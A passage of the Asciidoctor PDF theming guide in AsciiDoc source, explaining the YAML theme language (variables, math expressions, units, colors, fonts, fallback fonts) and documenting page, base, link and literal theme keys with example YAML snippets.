https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/base-theme.yml[base theme] will be used instead.\nUsing AFM fonts can result in missing functionality and warnings.\nSee the <<Built-In (AFM) Fonts>> section to learn more about these limitations.\n\ntoc::[]\n\n== Language Overview\n\nThe theme language in Asciidoctor PDF is based on the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many concepts from CSS and SASS.\nTherefore, if you have a background in web design, the theme language should be immediately familiar to you.\n\nLike CSS, themes have both selectors and properties.\nSelectors are the component you want to style.\nThe properties are the style elements of that component that can be styled.\nAll selector names are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font_size`).\n\n[NOTE]\n====\nThe theme language in Asciidoctor PDF supports a limited subset of the properties from CSS.\nSome of these properties have different names from those found in CSS.\n\n* Underscores (`_`) can be used in place of hyphens (`-`) for all property names in the theme language.\n* Instead of separate properties for font weight and font style, the theme language combines these settings in the `font_style` property (allowed values: `normal`, `bold`, `italic` and `bold_italic`).\n* The `text_align` property from CSS is the `align` property in the theme language.\n* The `color` property from CSS is the `font_color` property in the theme language.\n====\n\nA theme (or style) is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that resembles CSS and helps to describe the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.\n\nHere's an example of a basic theme file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n line_height_length: 17\n line_height: $base_line_height_length \/ $base_font_size\nvertical_spacing: $base_line_height_length\nheading:\n font_color: #262626\n font_size: 17\n font_style: bold\n line_height: 1.2\n margin_bottom: $vertical_spacing\nlink:\n font_color: #002FA7\noutline_list:\n indent: $base_font_size * 1.5\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme, which is loaded prior to loading your custom theme.\nAll the available keys are documented in <<Keys>>.\nThe converter uses the information from the theme map to help construct the PDF.\n\nWARNING: If you start a new theme from scratch, we strongly recommend defining TrueType fonts and specifying them in the `base` and `literal` categories.\nOtherwise, Asciidoctor PDF will use built-in AFM fonts, which can result in missing functionality and warnings.\n\n[TIP]\n====\nInstead of creating a theme from scratch, another option is to download the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default-theme.yml] file from the source repository.\nSave the file using a unique name (e.g., _custom-theme.yml_) and start hacking on it.\n\nAlternatively, you can snag the file from your local installation using the following command:\n\n $ ASCIIDOCTOR_PDF_DIR=`gem contents asciidoctor-pdf --show-install-dir`;\\\n cp \"$ASCIIDOCTOR_PDF_DIR\/data\/themes\/default-theme.yml\" custom-theme.yml\n====\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font_color`) into a single, qualified key (e.g., `link_font_color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase_font_color: #333333\nbase_font_family: Times-Roman\nbase_font_size: 12\n----\n\nOr, to avoid having to type the prefix `base_` multiple times, the keys may be written hierarchically:\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by two more spaces of indentation than the parent level.\nAlso note the presence of the colon after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n - Font family name (e.g., Roboto)\n - Font style (normal, bold, italic, bold_italic)\n - Alignment (left, center, right, justify)\n - Color as hex string (e.g., #ffffff)\n - Image path\n - Enumerated type (where specified)\n - Text content (where specified)\n* Null (clears any previously assigned value)\n - _empty_ (i.e., no value specified)\n - null\n - ~\n* Number (integer or float) with optional units (default unit is points)\n* Array\n - Color as RGB array (e.g., [51, 51, 51])\n - Color CMYK array (e.g., [50, 100, 0, 0])\n - Margin (e.g., [1in, 1in, 1in, 1in])\n - Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<Keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a principle feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font_family\n* font_color\n* font_size\n* font_style\n* text_transform\n* line_height (currently some exceptions)\n* margin_bottom (if not specified, defaults to $vertical_spacing)\n\n.Heading Inheritance\n****\nHeadings inherit starting from a specific heading level (e.g., `heading_h2_font_size`), then to the heading category (e.g., `heading_font_size`), then directly to the base value (e.g., `base_font_size`).\nAny setting from an enclosing context, such as a sidebar, is skipped.\n****\n\n=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar sign (`$`) (e.g., `$base_font_size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In order words, as soon as the key is assigned, it's available to be used as a variable).\n\nIMPORTANT: Variables are defined from top to bottom (i.e., in document order).\nTherefore, a variable must be defined before it is referenced.\nIn other words, the path the variable refers to must be *above* the usage of that variable.\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n----\n\nthe variable `$base_font_color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading_font_color` to the `$sidebar_title_font_color`.\n\n[source,yaml]\n----\nheading:\n font_color: #191919\nsidebar:\n title:\n font_color: $heading_font_color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very quickly.\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n font_size_small: $base_font_size * 0.85\n----\n\nWe'll cover more about math expressions later.\n\n==== Custom Variables\n\nYou can define arbitrary key names to make custom variables.\nThis is one way to group reusable values at the top of your theme file.\nIf you are going to do this, it's recommended that you organize the keys under a custom namespace, such as `brand`.\n\nFor instance, here's how you can define your brand colors:\n\n[source,yaml,subs=attributes+]\n----\nbrand:\n primary: #E0162B {conum-guard-yaml} <1>\n secondary: '#FFFFFF' {conum-guard-yaml} <2>\n alert: '0052A5' {conum-guard-yaml} <3>\n----\n<1> To align with CSS, you may add a `+#+` in front of the hex color value.\nA YAML preprocessor is used to ensure the value is not treated as a comment as it would normally be the case in YAML.\n<2> You may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.\n<3> The leading `+#+` on a hex value is entirely optional.\nHowever, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value.\n\nYou can now use these custom variables later in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: $brand_primary\n----\n\n=== Math Expressions & Functions\n\nThe theme language supports basic math operations to support calculated values.\nLike programming languages, multiple and divide take precedence over add and subtract.\n\nThe following table lists the supported operations and the corresponding operator for each.\n\n[width=25%]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nIMPORTANT: Operators must always be surrounded by a space on either side (e.g., 2 + 2, not 2+2).\n\nHere's an example of a math expression with fixed values.\n\n[source,yaml]\n----\nconum:\n line_height: 4 \/ 3\n----\n\nVariables may be used in place of numbers anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used if they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number up to the next integer.\nceil(...):: Rounds the number down the previous integer.\n\nYou might use these functions in font size calculations so that you get more exact values.\n\n[source,yaml]\n----\nbase:\n font_size: 12.5\n font_size_large: ceil($base_font_size * 1.25)\n----\n\n=== Measurement Units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nIf you specify a number without any units, the units defaults to pt.\n\nHowever, us humans like to think in real world units like inches (in), centimeters (cm), or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n\nThe following units are supported:\n\n[width=25%]\n|===\n|Unit |Suffix\n\n|Centimeter\n|cm\n\n|Inches\n|in\n\n|Millimeter\n|mm\n\n|Percentage^[1]^\n|%, vw, or vh\n\n|Points\n|pt (default)\n|===\n\n. A percentage with the % unit is calculated relative to the width or height of the content area.\nViewport-relative percentages (vw or vh units) are calculated as a percentage of the page width or height, respectively.\nCurrently, percentage units can only be used for placing elements on the title page or for setting the width of a block image.\n\nIMPORTANT: Numbers with more than two digits should be written as a float (e.g., 100.0), a math expression (e.g, 1 * 100), or with a unit (e.g., 100pt).\nOtherwise, the value may be misinterpreted as a hex color (e.g., '100') and could cause the converter to crash.\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\nThe order of elements in a measurement array is the same as it is in CSS:\n\n. top\n. right\n. bottom\n. left\n\n=== Alignments\n\nThe align subkey is used to align text and images within the parent container.\n\n==== Text Alignments\n\nText can be aligned as follows:\n\n* left\n* center\n* right\n* justify (stretched to each edge)\n\n==== Image Alignments\n\nImages can be aligned as follows:\n\n* left\n* center\n* right\n\n=== Font Styles\n\nIn most cases, whereever you can specify a custom font family, you can also specify a font style.\nThese two settings are combined to locate the font to use.\n\nThe following font styles are recognized:\n\n* normal (no style)\n* italic\n* bold\n* bold_italic\n\n=== Text Transforms\n\nMany places where font properties can be specified, a case transformation can be applied to the text.\nThe following transforms are recognized:\n\n* uppercase\n* lowercase\n* none (clears an inherited value)\n\n[CAUTION#transform-unicode-letters]\n====\nSince Ruby 2.4, Ruby has built-in support for transforming the case of any letter defined by Unicode.\n\nIf you're using Ruby < 2.4, and the text you want to transform contains characters beyond the Basic Latin character set (e.g., an accented character), you must install either the `activesupport` or the `unicode` gem in order for those characters to be transformed.\n\n $ gem install activesupport\n\nor\n\n $ gem install unicode\n====\n\n\/\/ Additional transforms, such as capitalize, may be added in the future.\n\n=== Colors\n\nThe theme language supports color values in three formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`, optional surrounding quotes or both.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\nTransparent:: The special value `transparent` indicates that a color should not be used.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`), optional surrounding quotes or both.\n\nTo align with CSS, you may add a `+#+` in front of the hex color value.\nA YAML preprocessor is used to ensure the value is not treated as a comment as it would normally be the case in YAML.\n\nYou also may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.\nIn this case, the leading `+#+` on a hex value is entirely optional.\n\nRegardless, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value.\n\nThe following are all equivalent values for the color red:\n\n[cols=\"8*m\"]\n|===\n|#ff0000\n|#FF0000\n|'ff0000'\n|'FF0000'\n|#f00\n|#F00\n|'f00'\n|'F00'\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: #ff0000\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how a RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [255, 0, 0]\n----\n\n==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 and 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string internally.\nPDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [0, 0.99, 1, 0]\n----\n\n==== Transparent\n\nIt's possible to specify no color by assigning the special value `transparent`, as shown here:\n\n[source,yaml]\n----\nbase:\n background_color: transparent\n----\n\n=== Images\n\nAn image is specified either as a bare image path or as an inline image macro as found in the AsciiDoc syntax.\nImages are currently resolved relative to the value of the `pdf-stylesdir` attribute.\n\nThe following image types (and corresponding file extensions) are supported:\n\n* PNG (.png)\n* JPEG (.jpg)\n* SVG (.svg)\n\nCAUTION: The GIF format (.gif) is not supported.\n\nHere's how an image is specified in the theme file as a bare image path:\n\n[source,yaml]\n----\ntitle_page:\n background_image: title-cover.png\n----\n\nIn this case, the image is resolved relative to theme directory.\n\nHere's how the image is specified using the inline image macro:\n\n[source,yaml]\n----\ntitle_page:\n background_image: image:title-cover.png[]\n----\n\nIn this case, the image is resolved relative to the value of the `imagesdir` attribute.\nWrapping the value in the image macro sends a hint to the converter to resolve it just like other images.\n\nLike in the AsciiDoc syntax, the inline image macro allows you to supply set the width of the image and the alignment:\n\n[source,yaml]\n----\ntitle_page:\n logo_image: image:logo.png[width=250,align=center] \n----\n\n=== Quoted String\n\nSome of the keys accept a quoted string as text content.\nThe final segment of these keys is always named `content`.\n\nA content key accepts a string value.\nIt's usually best to quote the string or use the http:\/\/symfony.com\/doc\/current\/components\/yaml\/yaml_format.html#strings[YAML multi-line string syntax].\n\nText content may be formatted using a subset of inline HTML.\nYou can use the well-known elements such as `<strong>`, `<em>`, `<code>`, `<a>`, `<sub>`, `<sup>`, `<del>`, and `<span>`.\nThe `<span>` element supports the `style` attribute, which you can use to specify the `color`, `font-weight`, and `font-style` CSS properties.\nYou can also use the `rgb` attribute on the `<color>` element to change the color or the `name` and `size` attributes on the `<font>` element to change the font properties.\nIf you need to add an underline or strikethrough decoration to the text, you can assign the `underline` or `line-through` to the `class` attribute on any aforementioned element.\n\nHere's an example of using formatting in the content of the menu caret:\n\n[source,yaml]\n----\nmenu_caret_content: \" <font size=\\\"1.15em\\\"><color rgb=\\\"#b12146\\\">\\u203a<\/color><\/font> \"\n----\n\nNOTE: The string must be double quoted in order to use a Unicode escape code like `\\u203a`.\n\nAdditionally, normal substitutions are applied to the value of content keys for <<Running Content (Header & Footer),running content>>, so you can use most AsciiDoc inline formatting (e.g., `+*strong*+` or `+{attribute-name}+`) in the values of those keys.\n\n== Fonts\n\nYou can select from <<built-in-afm-fonts,built-in PDF fonts>>, <<bundled-fonts,fonts bundled with Asciidoctor PDF>> or <<custom-fonts,custom fonts>> loaded from TrueType font (TTF) files.\nIf you want to use custom fonts, you must first declare them in your theme file.\n\nIMPORTANT: Asciidoctor has no challenge working with Unicode.\nIn fact, it prefers Unicode and considers the entire range.\nHowever, once you convert to PDF, you have to meet the font requirements of PDF in order to preserve Unicode characters.\nThere's nothing Asciidoctor can do to convince PDF to work with extended characters without the right fonts in play.\n\n=== Built-In (AFM) Fonts\n\nThe names of the built-in fonts (for general-purpose text) are as follows:\n\n[width=33.33%]\n|===\n|Font Name |Font Family\n\n|Helvetica\n|sans-serif\n\n|Times-Roman\n|serif\n\n|Courier\n|monospace\n|===\n\nUsing a built-in font requires no additional files.\nYou can use the key anywhere a `font_family` property is accepted in the theme file.\nFor example:\n\n[source,yaml]\n----\nbase:\n font_family: Times-Roman\n----\n\nHowever, when you use a built-in font, the characters you can use in your document are limited to the characters in the WINANSI (http:\/\/en.wikipedia.org\/wiki\/Windows-1252[Windows-1252]) code set.\nWINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc).\nFor anything outside of that, PDF is BYOF (Bring Your Own Font).\n\nEven though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.\nAsciidoctor PDF encodes the content into WINANSI when building the PDF.\n\nCAUTION: Built-in fonts do not use the <<fallback-fonts,fallback fonts>>.\nIn order for the fallback font to kick in, you must be using a TrueType font.\n\n.WINANSI Encoding Behavior\n****\nWhen using the built-in PDF (AFM) fonts on a block of content in your AsciiDoc document, any character that cannot be encoded to WINANSI is replaced with a logic \"`not`\" glyph (`¬`) and you'll see the following warning in your console:\n\n The following text could not be fully converted to the Windows-1252 character set:\n | <string with unknown glyph>\n\nThis behavior differs from the default behavior in Prawn, which simply crashes.\n\nYou'll often see this warning if you're using callouts in your document and you haven't specified a TrueType font in your theme.\nTo prevent this warning, you need to specify a TrueType font.\n\nFor more information about how Prawn handles character encodings for built-in fonts, see https:\/\/github.com\/prawnpdf\/prawn\/blob\/master\/CHANGELOG.md#vastly-improved-handling-of-encodings-for-pdf-built-in-afm-fonts[this note in the Prawn CHANGELOG].\n****\n\n=== Bundled Fonts\n\nAsciidoctor PDF bundles several fonts that are used by the default theme.\nYou can also use these fonts in your custom theme by simply declaring them.\nThese fonts provide more characters than the built-in PDF fonts, but still only a subset of UTF-8 (to reduce the size of the gem).\n\nThe family name of the fonts bundled with Asciidoctor PDF are as follows:\n\nhttp:\/\/www.google.com\/get\/noto\/#\/family\/noto-serif[Noto Serif]::\nA serif font that can be styled as normal, italic, bold or bold_italic.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1mn[M+ 1mn]::\nA monospaced font that maps different thicknesses to the styles normal, italic, bold and bold_italic.\nAlso provides the circuled numbers used in callouts.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1p[M+ 1p Fallback]::\nA sans-serif font that provides a very complete set of Unicode glyphs.\nCannot be styled as italic, bold or bold_italic.\nUsed as the fallback font.\n\nCAUTION: At the time of this writing, you cannot use the bundled fonts if you change the value of the `pdf-fontsdir` attribute (and thus define your own custom fonts).\nThis limitation may be lifted in the future.\n\n=== Custom Fonts\n\nThe limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.\nCustom fonts can enhance the look of your PDF theme substantially.\n\nTo start, you need to find a TTF file collection for the font you want to use.\nA collection typically consists of all four styles of a font:\n\n* normal\n* italic\n* bold\n* bold_italic\n\nYou'll need all four styles to support AsciiDoc content properly.\n_Asciidoctor PDF cannot italicize a font dynamically like a browser can, so you need the italic style._\n\nOnce you've obtained the TTF files, put them into a directory in your project where you want to store the fonts.\nIt's recommended that you name them consistently so it's easier to type the names in the theme file.\n\nLet's assume the name of the font is https:\/\/github.com\/google\/roboto\/tree\/master\/out\/RobotoTTF[Roboto].\nName the files as follows:\n\n* roboto-normal.ttf (_originally Roboto-Regular.ttf_)\n* roboto-italic.ttf (_originally Roboto-Italic.ttf_)\n* roboto-bold.ttf (_originally Roboto-Bold.ttf_)\n* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)\n\nNext, declare the font under the `font_catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n----\n\nYou can use the key that you assign to the font in the font catalog anywhere the `font_family` property is accepted in the theme file.\nFor instance, to use the Roboto font for all headings, you'd use:\n\n[source,yaml]\n----\nheading:\n font_family: Roboto\n----\n\nWhen you execute Asciidoctor PDF, you need to specify the directory where the fonts reside using the `pdf-fontsdir` attribute:\n\n $ asciidoctor-pdf -a pdf-style=basic-theme.yml -a pdf-fontsdir=path\/to\/fonts document.adoc\n\nWARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.\n\nWhen Asciidoctor PDF creates the PDF, it only embeds the glyphs from the font that are needed to render the characters present in the document.\nIn other words, Asciidoctor PDF automatically subsets the font.\nHowever, if you're storing the fonts in a repository, you may want to subset the font (for instance, by using FontForge) to reduce the space the font occupies in that storage.\nThis is simply a personal preference.\n\nYou can add any number of fonts to the catalog.\nEach font must be assigned a unique key, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n Roboto Light:\n normal: roboto-light-normal.ttf\n italic: roboto-light-italic.ttf\n bold: roboto-light-bold.ttf\n bold_italic: roboto-light-bold_italic.ttf\n----\n\nTIP: Text in SVGs will use the font catalog from your theme.\nWe recommend that you match the font key to the name of the font seen by the operating system.\nThis will allow you to use the same font names (aka families) in both your graphics program and Asciidoctor PDF.\n\n=== Fallback Fonts\n\nIf a TrueType font is missing a character needed to render the document, such as a special symbol, you can have Asciidoctor PDF look for the character in a fallback font.\nYou only need to specify a single fallback font, typically one that provides a full set of symbols.\n\nIMPORTANT: The fallback font is only used when the primary font is a TrueType font (i.e., TTF, DFont, TTC).\nAny glyph missing from an AFM font is simply replaced with the \"`not`\" glyph (`¬`).\n\nCAUTION: Using the fallback font slows down PDF generation slightly because it has to analyze every single character.\nIt's use is not recommended for large documents.\nInstead, it's best to select primary fonts that have all the characters you need.\nKeep in mind that the default theme currently uses a fallback font, though this may change in the future.\n\nLike with other custom fonts, you first need to declare the fallback font.\nLet's choose https:\/\/github.com\/android\/platform_frameworks_base\/blob\/master\/data\/fonts\/DroidSansFallback.ttf[Droid Sans Fallback].\nYou can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n----\n\nNext, add the key name to the `fallbacks` key under the `font_catalog` key.\nThe `fallbacks` key accepts an array of values, meaning you can specify more than one fallback font.\nHowever, we recommend using a single fallback font, if possible, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n fallbacks:\n - DroidSansFallback\n----\n\nTIP: If you are using more than one fallback font, add additional lines to the `fallbacks` key.\n\nOf course, make sure you've configured your theme to use your custom font:\n\n[source,yaml]\n----\nbase:\n font_family: Roboto\n----\n\nThat's it!\nNow you're covered.\nIf your custom font is missing a glyph, Asciidoctor PDF will look in your fallback font.\nYou don't need to reference the fallback font anywhere else in your theme file.\n\n== Keys\n\nThis section lists all the keys that are available when creating a custom theme.\nThe keys are organized by category.\nEach category represents a common prefix under which the keys are typically nested.\n\nTIP: Keys can be nested wherever an underscore (`_`) appears in the name.\nThis nested structure is for organizational purposes only.\nAll keys are flatted when the theme is loaded (e.g., `align` nested under `base` becomes `base_align`).\n\nThe converter uses the values of these keys to control how most elements are arranged and styled in the PDF.\nThe default values listed in this section get inherited from the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/base-theme.yml[base theme].\n\nIMPORTANT: The https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default theme] has a different set of values which are not shown in this guide.\n\nWhen creating a theme, all keys are optional.\nRequired keys are provided by the base theme.\nTherefore, you only have to declare keys that you want to override.\n\n[#keys-page]\n=== Page\n\nThe keys in this category control the size, margins and background of each page (i.e., canvas).\nWe recommended that you define this category before all other categories.\n\nNOTE: The background of the title page can be styled independently.\nSee <<Title Page>> for details.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-page]*Key Prefix:* <<key-prefix-page,page>>\n\n|background_color^[1]^\n|<<colors,Color>> +\n(default: #ffffff)\n|page:\n background_color: #fefefe\n\n|background_image^[1]^\n|Inline image macro^[2]^ +\n(default: _not set_)\n|page:\n background_image: image:page-bg.png[]\n\n|layout\n|portrait {vbar} landscape +\n(default: portrait)\n|page:\n layout: landscape\n\n|margin\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 36)\n|page:\n margin: [0.5in, 0.67in, 1in, 0.67in]\n\n|margin_inner^[3]^\n|<<measurement-units,Measurement>> +\n(default: 48)\n|page:\n margin_inner: 0.75in\n\n|margin_outer^[3]^\n|<<measurement-units,Measurement>> +\n(default: 24)\n|page:\n margin_outer: 0.59in\n\n|size\n|https:\/\/github.com\/prawnpdf\/pdf-core\/blob\/0.6.0\/lib\/pdf\/core\/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width,height]>> +\n(default: A4)\n|page:\n size: Letter\n|===\n\n. Page background images are automatically scaled to fit within the bounds of the page.\n+\nNOTE: Page backgrounds do not currently work when using AsciidoctorJ PDF.\nThis limitation is due to a bug in Prawn 1.3.1.\nThe limitation will remain until AsciidoctorJ PDF upgrades to Prawn 2.x (an upgrade that is waiting on AsciidoctorJ to migrate to JRuby 9000).\nFor more details, see http:\/\/discuss.asciidoctor.org\/Asciidoctor-YAML-style-file-for-PDF-and-maven-td3849.html[this thread].\n. Target may be an absolute path or a path relative to the value of the `pdf-stylesdir` attribute.\n. The margins for `recto` (right-hand, odd-numbered) and `verso` (left-hand, even-numbered) pages are calculated automatically from the margin_inner and margin_outer values.\nThese margins and used when the value `prepress` is assigned to the `media` document attribute.\n\n[#keys-base]\n=== Base\n\nThe keys in this category provide generic theme settings and are often referenced throughout the theme file as variables.\nWe recommended that you define this category after the page category and before all other categories.\n\nNOTE: While it's common to define additional keys in this category (e.g., `base_border_radius`) to keep your theme DRY, we recommend using <<Custom Variables,custom variables>> instead.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-base]*Key Prefix:* <<key-prefix-base,base>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: left)\n|base:\n align: justify\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|base:\n border_color: #eeeeee\n\n\/\/ border_radius is variable, not an official key\n\/\/|border_radius\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|base:\n border_width: 0.5\n\n|font_color\n|<<colors,Color>> +\n(default: #000000)\n|base:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: Helvetica)\n|base:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: 12)\n|base:\n font_size: 10.5\n\n\/\/ font_size_large is a variable, not an official key\n\/\/|font_size_large\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ font_size_large: 13\n\n|font_size_min\n|<<values,Number>> +\n(default: 9)\n|base:\n font_size_min: 6\n\n\/\/ font_size_small is a variable, not an official key\n\/\/|font_size_small\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ font_size_small: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: normal)\n|base:\n font_style: normal\n\n|text_transform^[1]^\n|none +\n(default: none)\n|base:\n text_transform: none\n\n|line_height_length^[2]^\n|<<values,Number>> +\n(default: 13.8)\n|base:\n line_height_length: 12\n\n|line_height^[2]^\n|<<values,Number>> +\n(default: 1.15)\n|base:\n line_height: >\n $base_line_height_length \/\n $base_font_size\n|===\n\n. The `text_transform` key cannot be set globally.\nTherefore, this key should not be used.\nThe value of `none` is implicit and is documented here for completeness.\n. You should set one of `line_height` or `line_height_length`, then derive the value of the other using a calculation as these are correlated values.\nFor instance, if you set `line_height_length`, then use `$base_line_height_length \/ $base_font_size` as the value of `line_height`.\n\n[#keys-vertical-spacing]\n=== Vertical Spacing\n\nThe keys in this category control the general spacing between elements where a more specific setting is not designated.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n|vertical_spacing\n|<<values,Number>> +\n(default: 12)\n|vertical_spacing: 10\n|===\n\n[#keys-link]\n=== Link\n\nThe keys in this category are used to style hyperlink text.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-link]*Key Prefix:* <<key-prefix-link,link>>\n\n|font_color\n|<<colors,Color>> +\n(default: #0000ee)\n|link:\n font_color: #428bca\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|link:\n font_family: Roboto\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|link:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|link:\n font_style: italic\n\n|text_decoration\n|none {vbar} underline {vbar} line-through +\n(default: none)\n|link:\n text_decoration: underline\n|===\n\n[#keys-literal]\n=== (Inline) Literal\n\nThe keys in this category are used for inline monospaced text in prose and table cells.\n\n[cols=\"3,4,5l\"]\n|===\n|Key 